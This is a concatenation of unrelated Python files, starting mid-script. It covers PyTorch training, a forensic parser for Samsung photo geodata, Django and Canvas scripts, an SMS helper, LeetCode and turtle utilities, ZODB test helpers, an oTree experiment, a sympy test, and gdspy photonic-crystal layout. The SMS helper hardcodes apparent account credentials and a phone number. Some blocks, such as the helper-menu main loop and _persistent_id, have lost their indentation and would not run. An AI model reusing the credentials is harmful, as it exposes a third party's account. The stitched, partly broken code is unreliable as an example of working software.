                        accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
                training_loss = running_loss/print_step
                valid_loss = loss_v/len(valid_loaders)
                valid_acc = accuracy/len(valid_loaders)
                # BUG FIX: the epoch total was hard-coded as 5, ignoring --epochs.
                print("current epoch: {}/{}". format(epoch+1, epochs))
                print("Training loss: {}".format(training_loss))
                print("Validation loss: {}".format(valid_loss))
                print("Validation accuracy: {}".format(valid_acc))
                running_loss = 0
                model.train()
# BUG FIX: the completion message used to print on every validation pass;
# it belongs after the whole training run.
print('Training process has finished.')
def check_accuracy(test_loaders):
    """Print top-1 accuracy (%) of the globally-trained `model` on *test_loaders*."""
    model.to(device)
    with torch.no_grad():
        accuracy = 0
        model.eval()
        for inputs, labels in test_loaders:
            inputs, labels = inputs.to(device),labels.to(device)
            output = model.forward(inputs)
            # NOTE(review): batch_loss is computed but never used — confirm.
            batch_loss = criterion(output, labels)
            #https://towardsdatascience.com/how-to-train-an-image-classifier-in-pytorch-and-
            #use-it-to-perform-basic-inference-on-single-images-99465a1e9bf5
            # Accumulate the fraction of correct top-1 predictions per batch.
            ps = torch.exp(output)
            top, top_class = ps.topk(1, dim=1)
            equals = top_class == labels.view(*top_class.shape)
            accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
        fin_test_acc = (100 * accuracy/len(test_loaders))
        print("test accuracy: {}".format(fin_test_acc))
check_accuracy(test_loaders)
# Save a checkpoint containing everything needed to rebuild the model for
# inference: weights, optimizer state, architecture name, classifier head,
# hyperparameters and the class-to-index mapping.
model.class_to_idx = train_dataset.class_to_idx
torch.save({'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(), 'arch': arch , 'classifier': model.classifier, 'hidden_size': hidden_layer, 'epochs':epochs, 'lr' : lr, 'class_to_idx': model.class_to_idx}, 'checkpoint.pth')
model.to(device)
import glob
import json
import os
import shutil
import sqlite3
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, is_platform_windows
def get_cmh(files_found, report_folder, seeker):
    """Parse geodata from a Samsung CMH (Content Media Hub) database and
    write it to an HTML artifact report.

    Args:
        files_found: paths matched for this artifact; only the first is read.
        report_folder: destination folder for the generated report.
        seeker: file seeker passed by the framework (unused here).
    """
    file_found = str(files_found[0])
    db = sqlite3.connect(file_found)
    cursor = db.cursor()
    cursor.execute('''
    SELECT
    datetime(datetaken /1000, "unixepoch") as times,
    latitude,
    longitude,
    address_text,
    uri,
    _data
    FROM location_view
    ''')
    all_rows = cursor.fetchall()
    usageentries = len(all_rows)
    if usageentries > 0:
        report = ArtifactHtmlReport('Samsung CMH')
        # FIX: dropped pointless f-prefixes on constant strings.
        report.start_artifact_report(report_folder, 'Geodata')
        report.add_script()
        data_headers = ('Data Taken', 'Latitude', 'Longitude','Address', 'URI', 'Data Location')
        # Each row already matches the header order of the SELECT above.
        data_list = [(row[0], row[1], row[2], row[3], row[4], row[5]) for row in all_rows]
        report.write_artifact_data_table(data_headers, data_list, file_found)
        report.end_artifact_report()
    else:
        logfunc('No Samsung_CMH_GeoData available')
    db.close()
    return
import argparse
import json
import os
import django
import logging
# Canvas account/URL constants for the VU FSW faculty.
FSW_ACCOUNT = 18
CANVAS_URL = "https://canvas.vu.nl"
# Django must be configured before the project models can be imported below.
os.environ['DJANGO_SETTINGS_MODULE'] = 'dejavu.settings'
django.setup()
logging.basicConfig(level=logging.INFO, format='[%(asctime)s %(name)-12s %(levelname)-5s] %(message)s')
import canvasapi
from dejaviewer.models import Course, CourseField
# The only CLI argument is the Canvas API key.
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('apikey')
args = parser.parse_args()
canvas = canvasapi.Canvas(CANVAS_URL, args.apikey)
# Copy the Canvas syllabus body into the local course's 'description' field.
c = Course.objects.get(code="S_D1")
course = canvas.get_course(c.canvas_course, include=["syllabus_body"])
# NOTE(review): `f` is fetched but never used; set_field is called with the
# field-name string instead — confirm whether this lookup is required.
f = CourseField.objects.get(field='description')
c.set_field("description", "canvas syllabus", course.syllabus_body)
c.save()
|
# Generated by Django 3.1.3 on 2021-10-17 06:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the insta app: Profile, Image and Comment models."""
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        # One-to-one extension of the auth user with an avatar and bio.
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('profile_picture', models.ImageField(upload_to='images/')),
                ('bio', models.TextField(blank=True, default='Bio', max_length=500)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # An uploaded image posted by a profile; likes are auth users.
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image_name', models.CharField(blank=True, max_length=80)),
                ('image_caption', models.CharField(max_length=600)),
                ('comments', models.CharField(blank=True, max_length=30)),
                ('image', models.ImageField(upload_to='images/')),
                ('image_profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='insta.profile')),
                ('likes', models.ManyToManyField(blank=True, related_name='likes', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # A comment made by a profile on an image post.
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comment', models.TextField()),
                ('date', models.DateTimeField(auto_now_add=True, null=True)),
                ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='insta.image')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='insta.profile')),
            ],
        ),
    ]
|
# -*- coding:utf-8 -*-
from ihome.libs.yuntongxun.CCPRestSDK import REST
# Yuntongxun (Ronglian Cloud) REST SDK credentials and endpoint settings.
# Main-account SID: shown as "ACCOUNT SID" under Console -> Applications.
_accountSid = '8aaf070858862df301588a202b520154'
# Main-account token: shown as "AUTH TOKEN" under Console -> Applications.
_accountToken = 'd42ff3839c2f4defa0361e5e11234b11'
# Application ID: the APPID of the default or a self-created application.
_appId = '8aaf070858862df301588a202ba50159'
# Request host; this is the sandbox — use app.cloopen.com in production.
_serverIP = 'sandboxapp.cloopen.com'
# Request port; 8883 in production as well.
_serverPort = '8883'
# REST API version number; keep unchanged.
_softVersion = '2013-12-26'
# 云通讯官方提供的发送短信代码实例
# # 发送模板短信
# # @param to 手机号码
# # @param datas 内容数据 格式为数组 例如:{'12','34'},如不需替换请填 ''
# # @param $tempId 模板Id
#
# def sendTemplateSMS(to, datas, tempId):
# # 初始化REST SDK
# rest = REST(serverIP, serverPort, softVersion)
# rest.setAccount(accountSid, accountToken)
# rest.setAppId(appId)
#
# result = rest.sendTemplateSMS(to, datas, tempId)
# for k, v in result.iteritems():
#
# if k == 'templateSMS':
# for k, s in v.iteritems():
# print '%s:%s' % (k, s)
# else:
# print '%s:%s' % (k, v)
class CCP(object):
    """Singleton helper for sending SMS through the Yuntongxun REST SDK."""
    def __new__(cls, *args, **kwargs):
        # Lazily create the single shared instance (with its configured REST
        # client) on first call; every later CCP() returns the same object.
        if not hasattr(CCP, "_instance"):
            cls._instance = super(CCP, cls).__new__(cls, *args, **kwargs)
            cls._instance.rest = REST(_serverIP, _serverPort, _softVersion)
            cls._instance.rest.setAccount(_accountSid, _accountToken)
            cls._instance.rest.setAppId(_appId)
        return cls._instance
    def send_template_sms(self, to, datas, temp_id):
        """Send a template SMS.

        Args:
            to: recipient phone number.
            datas: template substitution values, e.g. ['12', '34']; pass ''
                when no substitution is needed.
            temp_id: template id.

        Returns:
            0 if the SDK reports success, -1 otherwise.
        """
        result = self.rest.sendTemplateSMS(to, datas, temp_id)
        # The SDK signals success with statusCode == "000000".
        if result.get("statusCode") == "000000":
            return 0
        else:
            return -1
if __name__ == '__main__':
    ccp = CCP()
    # NOTE: template id 1 is the sandbox test template.
    ccp.send_template_sms('18949599846', ['1234', 5], 1)
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@File : 78.py
@Contact : huanghoward@foxmail.com
@Modify Time : 2022/5/28 18:54
------------
"""
from typing import List
class Solution:
    def subsets(self, nums: List[int]) -> List[List[int]]:
        """Return every subset of *nums* via include/exclude backtracking."""
        res = []

        def back(index, path):
            # Once every element has been decided, record the finished subset.
            if index == len(nums):
                res.append(path)
                return
            back(index + 1, path + [nums[index]])  # include nums[index]
            back(index + 1, path)                  # exclude nums[index]

        back(0, [])
        print(res)
        # BUG FIX: the result annotated as List[List[int]] was never returned.
        return res
if __name__ == '__main__':
    # Demo run: subsets() prints all subsets of [1, 2, 3].
    s = Solution()
    s.subsets([1, 2, 3])
|
import turtle
import pyperclip as pc
class TreeNode:
    """A binary-tree node holding a value and optional left/right children."""

    def __init__(self, val, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right

    def __repr__(self):
        return f"TreeNode({self.val})"
class TreeBuild:
    """ Display how our tree looks like.

    Interactively reads LeetCode-style level-order strings (e.g.
    '[1,2,null,3]') and renders the tree with turtle graphics.
    """
    def __init__(self):
        # Keep prompting until the user answers anything but 'y'/'Y'.
        repeat = "y"
        while repeat == "y" or repeat == "Y":
            ar = input("Enter the tree info in form '[...]': \n").strip()
            print(ar)
            self.drawtree(self.deserialize(ar))
            repeat = input("Display another tree, if true 'y' else 'n' : ").strip()
    @staticmethod
    def deserialize(string):
        """Build a binary tree from a level-order string; '{}' yields None."""
        if string == "{}":
            return None
        nodes = [
            None if val == "null" else TreeNode(int(val))
            for val in string.strip("[]{}").split(",")
        ]
        # Reverse so pop() hands out children in left-to-right order.
        kids = nodes[::-1]
        root = kids.pop()
        for node in nodes:
            if node:
                if kids:
                    node.left = kids.pop()
                if kids:
                    node.right = kids.pop()
        return root
    @staticmethod
    def drawtree(root):
        """Render the tree with turtle, halving the horizontal spread per level."""
        def height(root):
            # Height in edges; -1 for an empty tree.
            return 1 + max(height(root.left), height(root.right)) if root else -1
        def jumpto(x, y):
            # Move the pen without drawing a line.
            t.penup()
            t.goto(x, y)
            t.pendown()
        def draw(node, x, y, dx):
            # Draw the edge into (x, y), label the node, then recurse on children.
            if node:
                t.goto(x, y)
                jumpto(x, y - 20)
                t.write(node.val, align="center", font=("Arial", 12, "normal"))
                draw(node.left, x - dx, y - 60, dx / 2)
                jumpto(x, y - 20)
                draw(node.right, x + dx, y - 60, dx / 2)
        t = turtle.Turtle()
        t.speed(0)
        turtle.delay(0)
        h = height(root)
        jumpto(0, 30 * h)
        draw(root, 0, 30 * h, 40 * h)
        t.hideturtle()
        turtle.mainloop()
class SquareBracketToCurlyBracket:
    """ [[ ]] -> {{}} or [] -> {} or [[...[]...]] -> {{..{}..}}

    Reads input, converts square brackets to curly ones and copies the
    result to the clipboard.
    """
    def __init__(self):
        # BUG FIX: the previous `while flag:` loop never updated `flag`, so
        # this helper could not be exited; use the same continue-prompt
        # convention as the other helper classes in this script.
        repeat = "y"
        while repeat == "y" or repeat == "Y":
            s = input(
                "Enter input in valid form (e.g., [a, b, c, ...]): \n"
            ).strip()
            pc.copy(s.replace("[", "{").replace("]", "}"))
            pc.paste()
            repeat = input("Continue, if true 'y' else 'n': ").strip()
class ToCharArray:
    """Interactively convert a string like "add" into a char-array literal
    such as {'a', 'd', 'd'} and copy it to the clipboard."""
    def stringToCharArray(self, s):
        """Return *s* rendered as {'a', 'b', ...}; surrounding double quotes
        are stripped first. An empty string yields "{}"."""
        if s.startswith('"'):
            s = s[1:]
        if s.endswith('"'):
            s = s[:-1]
        # join() avoids the quadratic `+=` loop and the shadowing of the
        # builtin `str`; it also fixes the empty-string case, which used to
        # produce "}" instead of "{}".
        result = "{" + ", ".join("'" + ch + "'" for ch in s) + "}"
        print(result)
        return result
    def __init__(self):
        answer = "y"
        while answer == "y":
            s = input("print string to char array: \n").strip()
            pc.copy(self.stringToCharArray(s))
            pc.paste()
            answer = input("Coninue, if true 'y' else 'n': ")
if __name__ == "__main__":
rep = "y"
while rep == "y" or rep == "Y":
print("*" * 10 + " ~~HELPER MENU~~ " + "*" * 10 + "\n")
print("1. Draw Tree (press 1) ")
print("2. Convert [] to {} (press 2) ")
print("3. String to CharArray e.g., \"add\" -> \"{'a','d','d'}\" (press 3)")
inp = int(input("\nPress enter your choice : "))
print()
if inp == 1:
t = TreeBuild()
elif inp == 2:
t = SquareBracketToCurlyBracket()
elif inp == 3:
t = ToCharArray()
else:
exit()
rep = input(
"\nDo you want to see 'HELPER MENU', if true 'y' else 'n' : "
).strip()
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Provide a mixin base class for storage tests.
The StorageTestBase class provides basic setUp() and tearDown()
semantics (which you can override), and it also provides a helper
method _dostore() which performs a complete store transaction for a
single object revision.
"""
from __future__ import print_function
import sys
import time
from ZODB.Connection import TransactionMetaData
from ZODB.utils import u64, z64
from ZODB.tests.MinPO import MinPO
from ZODB._compat import PersistentPickler, Unpickler, BytesIO, _protocol
import ZODB.tests.util
ZERO = z64
def snooze():
    """Block until time.time() advances past its current value.

    On Windows two successive time.time() calls can return the same value,
    while timestamps are required to strictly increase. Call this before
    packing a storage or whenever a strictly later timestamp is needed.
    """
    start = time.time()
    while time.time() == start:
        time.sleep(0.1)
def _persistent_id(obj):
oid = getattr(obj, "_p_oid", None)
if getattr(oid, "__get__", None) is not None:
return None
else:
return oid
def zodb_pickle(obj):
    """Create a pickle in the format expected by ZODB.

    A ZODB data record holds two consecutive pickles: (class, args) metadata
    followed by the object's state.
    """
    f = BytesIO()
    p = PersistentPickler(_persistent_id, f, _protocol)
    klass = obj.__class__
    assert not hasattr(obj, '__getinitargs__'), "not ready for constructors"
    args = None
    mod = getattr(klass, '__module__', None)
    if mod is not None:
        # Reference the class as (module, name) rather than pickling it whole.
        klass = mod, klass.__name__
    state = obj.__getstate__()
    p.dump((klass, args))
    p.dump(state)
    return f.getvalue()
def persistent_load(pid):
    """Helper for zodb_unpickle: render a persistent reference as text."""
    oid, klass_info = pid[0], pid[1]
    return f"ref to {klass_info[0]}.{klass_info[1]} oid={u64(oid)}"
def zodb_unpickle(data):
    """Unpickle an object stored using the format expected by ZODB.

    The record holds two pickles: (class_info, args) followed by the state;
    the class is resolved and instantiated, then its state is restored.
    """
    f = BytesIO(data)
    u = Unpickler(f)
    u.persistent_load = persistent_load
    klass_info = u.load()
    if isinstance(klass_info, tuple):
        if isinstance(klass_info[0], type):
            # Unclear: what is the second part of klass_info?
            klass, xxx = klass_info
            assert not xxx
        else:
            # Class referenced as (module, name), possibly nested one level.
            if isinstance(klass_info[0], tuple):
                modname, klassname = klass_info[0]
            else:
                modname, klassname = klass_info
            if modname == "__main__":
                ns = globals()
            else:
                mod = import_helper(modname)
                ns = mod.__dict__
            try:
                klass = ns[klassname]
            except KeyError:
                print("can't find %s in %r" % (klassname, ns), file=sys.stderr)
            # NOTE(review): if the lookup above failed, `klass` is unbound
            # here and this raises UnboundLocalError — confirm intent.
            inst = klass()
    else:
        raise ValueError("expected class info: %s" % repr(klass_info))
    state = u.load()
    inst.__setstate__(state)
    return inst
def import_helper(name):
    """Return the module named *name*, importing it first if necessary."""
    # __import__ returns the top-level package for dotted names, so fetch
    # the fully-qualified module from sys.modules instead.
    __import__(name)
    return sys.modules[name]
class StorageTestBase(ZODB.tests.util.TestCase):
    """Mixin base class for storage tests: setUp/tearDown plus _dostore/_undo helpers."""
    # It would be simpler if concrete tests didn't need to extend
    # setUp() and tearDown().
    _storage = None
    def _close(self):
        # You should override this if closing your storage requires additional
        # shutdown operations.
        if self._storage is not None:
            self._storage.close()
    def tearDown(self):
        # Close the storage first, then let the base class clean up.
        self._close()
        ZODB.tests.util.TestCase.tearDown(self)
    def _dostore(self, oid=None, revid=None, data=None,
                 already_pickled=0, user=None, description=None, extension=None):
        """Do a complete storage transaction. The defaults are:
        - oid=None, ask the storage for a new oid
        - revid=None, use a revid of ZERO
        - data=None, pickle up some arbitrary data (the integer 7)
        Returns the object's new revision id.
        """
        if oid is None:
            oid = self._storage.new_oid()
        if revid is None:
            revid = ZERO
        if data is None:
            data = MinPO(7)
        if type(data) == int:
            # Bare ints are wrapped in MinPO so they can carry a state.
            data = MinPO(data)
        if not already_pickled:
            data = zodb_pickle(data)
        # Begin the transaction
        t = TransactionMetaData(extension=extension)
        if user is not None:
            t.user = user
        if description is not None:
            t.description = description
        try:
            self._storage.tpc_begin(t)
            # Store an object
            r1 = self._storage.store(oid, revid, data, '', t)
            # Finish the transaction
            r2 = self._storage.tpc_vote(t)
            revid = self._storage.tpc_finish(t)
        except:
            # Abort on any failure so the storage is left clean, then re-raise.
            self._storage.tpc_abort(t)
            raise
        return revid
    def _dostoreNP(self, oid=None, revid=None, data=None,
                   user=None, description=None):
        # Convenience wrapper: `data` is already pickled ("NP" = no pickling).
        return self._dostore(oid, revid, data, 1, user, description)
    # The following methods depend on optional storage features.
    def _undo(self, tid, expected_oids=None, note=None):
        # Undo a tid that affects a single object (oid).
        # This is very specialized.
        t = TransactionMetaData()
        t.note(note or u"undo")
        self._storage.tpc_begin(t)
        undo_result = self._storage.undo(tid, t)
        vote_result = self._storage.tpc_vote(t)
        if expected_oids is not None:
            # Affected oids may be reported by undo() and/or tpc_vote().
            oids = set(undo_result[1]) if undo_result else set()
            if vote_result:
                oids.update(vote_result)
            self.assertEqual(oids, set(expected_oids))
        return self._storage.tpc_finish(t)
|
from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,
Currency as c, currency_range,
)
import random
author = 'Victor_Farah'
doc = """
The Surrogation Game
"""
class Constants(BaseConstants):
    # oTree session constants for the surrogation app: single round,
    # no fixed group size.
    name_in_url = 'surrogation'
    players_per_group = None
    num_rounds = 1
class Subsession(BaseSubsession):
    def creating_session(self):
        """Assign treatment variables to every player when the session is created."""
        # randomize to treatments
        # Now always set to surrogation treatment
        for player in self.get_players():
            #player.surrogation = random.choice(['yes', 'no'])
            player.surrogation = 'yes'
            print('set player.surrogation to', player.surrogation)
            # Randomly pick a measured skill if in the surrogation treatment
            if player.surrogation == 'yes':
                player.measure_skill = random.choice(['Intelligence', 'Strength', 'Charisma', 'Agility', 'Stamina'])
                print('set player.measure_skill to', player.measure_skill)
        # randomize avatar condition
        # Now always set to avatar treatment
        for player in self.get_players():
            #player.avatar = random.choice(['yes', 'no'])
            player.avatar = 'yes'
            print('set player.avatar to', player.avatar)
class Group(BaseGroup):
    # No group-level state is needed in this app.
    pass
class Player(BasePlayer):
    # Consent checkboxes shown on the instruction/character pages.
    accept_instructions = models.BooleanField(blank=False, widget=widgets.CheckboxInput)
    accept_character = models.BooleanField(blank=False, widget=widgets.CheckboxInput)
    # Treatment assignments, set in Subsession.creating_session ('yes'/'no').
    surrogation = models.StringField()
    measure_skill = models.StringField()
    avatar = models.StringField()
    #Traits
    #intelligence = models.FloatField(
    #widget=widgets.SliderInput(attrs={'step': '1', 'style': 'width:500px'}, show_value=True),
    #min=0,
    #initial=None,
    #max=100,
    #)
    # Self-reported character trait scores (optional inputs).
    intelligence = models.IntegerField(blank=True)
    strength = models.IntegerField(blank=True)
    charisma = models.IntegerField(blank=True)
    agility= models.IntegerField(blank=True)
    stamina = models.IntegerField(blank=True)
    gender = models.IntegerField(
        blank=False,
        choices=[
            [1, 'Male'],
            [2, 'Female']
        ]
    )
from .context import assert_equal, get_simple_examples
import pytest
from sympy import Abs
# Absolute-value test cases shared across all delimiter notations.
examples = get_simple_examples(Abs)
# Left/right delimiter pairs that denote absolute value in LaTeX.
delimiter_pairs = {
    '|': '|',
    '\\vert': '\\vert',
    '\\lvert': '\\rvert'
}
@pytest.mark.parametrize('input, output, symbolically', examples)
def test_abs(input, output, symbolically):
    # Each delimiter pair is checked bare, with \left/\right sizing, and
    # with the mathtools \mleft/\mright variants.
    for left, right in delimiter_pairs.items():
        assert_equal("{left}{input}{right}".format(left=left, right=right, input=input), output, symbolically=symbolically)
        assert_equal("\\left{left}{input}\\right{right}".format(left=left, right=right, input=input), output, symbolically=symbolically)
        assert_equal("\\mleft{left}{input}\\mright{right}".format(left=left, right=right, input=input), output, symbolically=symbolically)
|
import gdspy
import math
def waveguide(w,l,layer):
    """ waveguide rectangle of width w and length l, centred on the origin.
    `layer` is a keyword dict unpacked into gdspy.Rectangle. """
    wg=gdspy.Rectangle((-l/2,-w/2),(l/2,w/2),**layer)
    return wg
def photonic_crystal(normal_holes,taper_holes,radius,taper_depth,spacing,
    cell_name,input_taper_holes,input_taper_percent,layer):
    """ define a parabolically tapered photonic crystal cavity. hole size
    and length are tapered simulataneously. a certain number of input taper
    holes can be defined to reduce input scattering loss.
    also returns the length of the photonic crystal

    NOTE(review): `cell_name` is unused in this body — confirm before removing.
    """
    # The smallest hole-to-hole spacing sits at the cavity centre.
    min_spacing=taper_depth*spacing
    dist=min_spacing/2
    holes=[]
    # add taper holes
    for i in range(taper_holes):
        if i>0:
            # parabolic (i^2) growth of spacing back to the nominal value
            dist+=spacing*taper_depth+i**2*(1-taper_depth)*spacing/(taper_holes**2)
        # parabolic growth of the hole radius away from the centre
        rad=taper_depth*radius+((i**2)*(1-taper_depth)*radius/(taper_holes**2))
        hole_pos=gdspy.Round((dist,0),rad,number_of_points=199,**layer)
        hole_neg=gdspy.Round((-dist,0),rad,number_of_points=199,**layer)
        # add all holes to a list
        holes.append(hole_pos)
        holes.append(hole_neg)
    # add untapered holes
    for i in range(normal_holes):
        dist+=spacing
        hole_pos=gdspy.Round((dist,0),radius,number_of_points=199,**layer)
        hole_neg=gdspy.Round((-dist,0),radius,number_of_points=199,**layer)
        holes.append(hole_pos)
        holes.append(hole_neg)
    # add input taper: one-sided, linearly shrinking hole radius
    for i in range(input_taper_holes):
        dist+=spacing
        rad=radius-radius*(1-input_taper_percent)/input_taper_holes*(i+1)
        hole_neg=gdspy.Round((-dist,0),rad,number_of_points=199,**layer)
        holes.append(hole_neg)
    # total crystal length spans symmetrically about the origin
    l_tot=dist*2
    return holes,l_tot
def wg_support(wg_width,w,l,layer):
    """ add a support at the top of the waveguide where it attaches to the
    substrate.

    The support is a trapezoid flaring from the waveguide width to
    wg_width + w over a length l.
    """
    support_pts=[(0,-wg_width/2),(0,wg_width/2),(l,wg_width/2+w/2),(l,-wg_width/2-w/2)]
    support=gdspy.Polygon(support_pts,**layer)
    return support
def input_taper(min_width,wg_width,l,layer):
    """ taper the waveguide to a given width.

    Trapezoid narrowing from wg_width down to min_width over length l.
    """
    # the origin of the input taper is defined where it contacts the waveguide
    input_pts=[(-l,-min_width/2),(-l,min_width/2),(0,wg_width/2),(0,-wg_width/2)]
    input_shp=gdspy.Polygon(input_pts,**layer)
    return input_shp
def support_tether(width,length,max_width,taper_length,wg_width,layer):
    """add support tethers along the waveguide.

    Each tether is a thin rectangle on both sides of the waveguide plus a
    trapezoidal anchor flaring out to max_width over taper_length.
    Returns [tether_l, tether_r, support_l, support_r].
    """
    # add the lines for each tether without the triangular support
    tether_l=gdspy.Rectangle((-width/2,-wg_width/2),(width/2,-length-wg_width/2),**layer)
    tether_r=gdspy.Rectangle((-width/2,wg_width/2),(width/2,length+wg_width/2),**layer)
    # add the support taper for each tether
    support_pts_l=[(-width/2,-wg_width/2-length),(width/2,-wg_width/2-length),(max_width/2,-wg_width-length-taper_length),
                   (-max_width/2,-wg_width-length-taper_length)]
    support_pts_r=[(-width/2,wg_width/2+length),(width/2,wg_width/2+length),(max_width/2,wg_width+length+taper_length),
                   (-max_width/2,wg_width+length+taper_length)]
    # add the points to a polygon
    support_l=gdspy.Polygon(support_pts_l,**layer)
    support_r=gdspy.Polygon(support_pts_r,**layer)
    return [tether_l,tether_r,support_l,support_r]
def bounding_rectangle(pattern_w,pattern_l,padding,layer,rect_shift,clearance,opt_litho_layer):
    """Frame of width `padding` around the pattern, plus an optical-litho rect.

    rect_shift is an (x, y) tuple offsetting the rectangles from the origin.
    Returns (frame geometry, pattern_l, optical-litho rectangle).
    """
    xshift, yshift = rect_shift
    interior_rectangle = gdspy.Rectangle(
        (-pattern_l/2+xshift, -pattern_w/2+yshift),
        (pattern_l/2+xshift, pattern_w/2+yshift), **layer)
    # BUGFIX: `layer` is a kwargs dict and was previously passed positionally
    # here (without **), which handed the dict to gdspy as the layer number.
    exterior_rectangle = gdspy.Rectangle(
        (-pattern_l/2-padding+xshift, -pattern_w/2-padding+yshift),
        (pattern_l/2+padding+xshift, pattern_w/2+padding+yshift), **layer)
    # rectangle used for optical lithography, inset by `clearance` so the PR
    # pattern overlaps the ebeam pattern
    opt_rectangle = gdspy.Rectangle(
        (-pattern_l/2-padding+xshift+clearance, -pattern_w/2-padding+yshift+clearance),
        (pattern_l/2+padding+xshift-clearance, pattern_w/2+padding+yshift-clearance),
        **opt_litho_layer)
    # subtract the interior rectangle from the exterior to leave a frame
    sub = gdspy.boolean(exterior_rectangle, interior_rectangle, 'not')
    return sub, pattern_l, opt_rectangle
def phc_wg(normal_holes,taper_holes,radius,taper_depth,spacing,
    cell_name,input_taper_holes,input_taper_percent,layer_phc,
    wg_width,extra_space,layer_wg,support_width,support_length,
    taper_width,taper_length,tether_width,tether_length,tip_space,
    clearance,opt_litho_layer,padding):
    """Generate a photonic-crystal cavity on a matching-length waveguide.

    extra_space is the extra waveguide length beyond the photonic crystal on
    each side. Returns (device_cell, bounding_rect, total_len, total_w,
    rect_shift, opt_rectangle).
    """
    # photonic-crystal hole pattern and its total length
    phc_geom,wg_l=photonic_crystal(normal_holes,taper_holes,radius,
        taper_depth,spacing,cell_name,input_taper_holes,input_taper_percent,layer_phc)
    wg_geom=waveguide(wg_width,wg_l+extra_space*2,layer_wg)
    # subtract the photonic crystal holes from the waveguide
    phc_wg=gdspy.boolean(wg_geom,phc_geom,'not')
    # end support where the waveguide attaches to the substrate, shifted to
    # the +x end of the waveguide; same layer as the waveguide
    supp_geom=wg_support(wg_width,support_width,support_length,layer_wg)
    supp_cell=gdspy.Cell('support structure '+cell_name)
    supp_cell.add(supp_geom)
    supp_ref=gdspy.CellReference(supp_cell,(wg_l/2+extra_space,0))
    # waveguide input taper at the opposite (-x) end
    taper_geom=input_taper(taper_width,wg_width,taper_length,layer_wg)
    taper_cell=gdspy.Cell('input taper cell '+cell_name)
    taper_cell.add(taper_geom)
    taper_ref=gdspy.CellReference(taper_cell,(-wg_l/2-extra_space,0))
    # support tethers, placed between the waveguide taper and photonic crystal
    tether_geom=support_tether(tether_width,tether_length,support_width,support_length,
        wg_width,layer_wg)
    tether_cell=gdspy.Cell('tether '+cell_name)
    tether_cell.add(tether_geom)
    tether_ref=gdspy.CellReference(tether_cell,(-wg_l/2-extra_space/2,0))
    # bounding box: total length includes supports, taper and tip clearance
    total_len=wg_l+extra_space*2+support_length+taper_length+tip_space
    # pattern centre offset used to shift the bounding rectangle
    center=-taper_length/2+support_length/2-tip_space/2
    # total width of pattern including tethers and supports
    total_w=wg_width+tether_length*2+support_length*2
    rect_shift=(center,0)
    bounding_rect,pattern_l,opt_rectangle=bounding_rectangle(total_w,total_len,padding,layer_wg,rect_shift,clearance,opt_litho_layer)
    # assemble the device cell
    device_cell=gdspy.Cell('device '+cell_name)
    device_cell.add([phc_wg])
    # BUGFIX: tether_ref was previously listed twice in this add() call,
    # which writes the tether geometry twice (doubling e-beam exposure dose);
    # each reference is now added exactly once.
    device_cell.add([tether_ref,supp_ref,taper_ref])
    return device_cell,bounding_rect,total_len,total_w,rect_shift,opt_rectangle
def txt_label(list):
    """Join the items of `list` into a single dash-separated label string.

    BUGFIX: the old implementation decided whether to prepend a dash by
    comparing each element to the first element *by value* (`i == list[0]`),
    so any later element equal to the first was appended without a dash
    (e.g. [1, 2, 1] -> '1-21'). Joining by position fixes that.

    (The parameter name shadows the builtin `list`; kept for backward
    compatibility with keyword callers.)
    """
    return '-'.join(str(item) for item in list)
def text_rect(bounding_box,box_length,box_width,txt_label,txt_height,layer,rect_shift,extra_text=None):
    """Subtract a vertical text label from the bounding rectangle.

    The label is placed 1 um past the +x end of the pattern, at the top edge
    of the box. extra_text is accepted for API compatibility but is currently
    unused. Returns the boolean-subtracted geometry.
    (Cleanup: removed a debug print and the unused `test1` local.)
    """
    # 1 um offset past the end of the pattern
    offset = box_length / 2 + 1
    xshift, yshift = rect_shift
    vtext = gdspy.Text(txt_label, txt_height,
                       (offset + xshift, box_width / 2 + yshift),
                       horizontal=False, **layer)
    # subtract the text from the rectangle so it prints as a cut-out
    sub = gdspy.boolean(bounding_box, vtext, 'not')
    return sub
def cavity_text(text_box,cavity_cell,cell_name,opt_rectangle):
    """
    Output a cell combining a labeled cavity with its text box.

    text_box: geometry with the label already subtracted (see text_rect).
    cavity_cell: the cell containing the cavity geometry.
    cell_name: suffix used to keep the new cell names unique.
    opt_rectangle: optical-lithography rectangle added alongside the text.
    Returns a cell containing the text and cavity, both rotated by 90 deg.
    """
    # the location of the bounding box will be shifted by the support length and the taper length
    # locate pattern center
    txtcell=gdspy.Cell('text '+cell_name)
    txtcell.add([text_box,opt_rectangle])
    # both references are rotated 90 degrees so the device runs vertically
    txtref=gdspy.CellReference(txtcell,(0,0),rotation=90)
